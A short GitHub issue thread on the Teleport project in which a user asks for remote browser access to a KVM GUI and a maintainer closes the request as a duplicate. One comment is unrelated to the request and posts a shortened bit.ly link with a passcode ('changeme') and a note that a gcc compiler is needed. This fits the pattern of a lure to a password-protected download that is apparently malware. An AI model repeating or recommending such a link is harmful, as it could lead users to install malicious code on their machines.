### ISSUE TITLE
Request for open a web interface remotely

### ISSUE THREAD

**Issue by jemeesh** [gravitational/teleport#46283]
What would you like Teleport to do?
Open access to kvm gui from redhat
Similarly i can reach any remote machines gui through browser remotely

What problem does this solve?
creating virtual machines and edits more easier

If a workaround exists, please include it.

**Comment by andersonsilva87** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by strideynet** [comment]
Is this a duplicate of https://github.com/gravitational/teleport/issues/13179 ?

**Comment by strideynet** [comment]
Closing as dupe of https://github.com/gravitational/teleport/issues/13179 ?
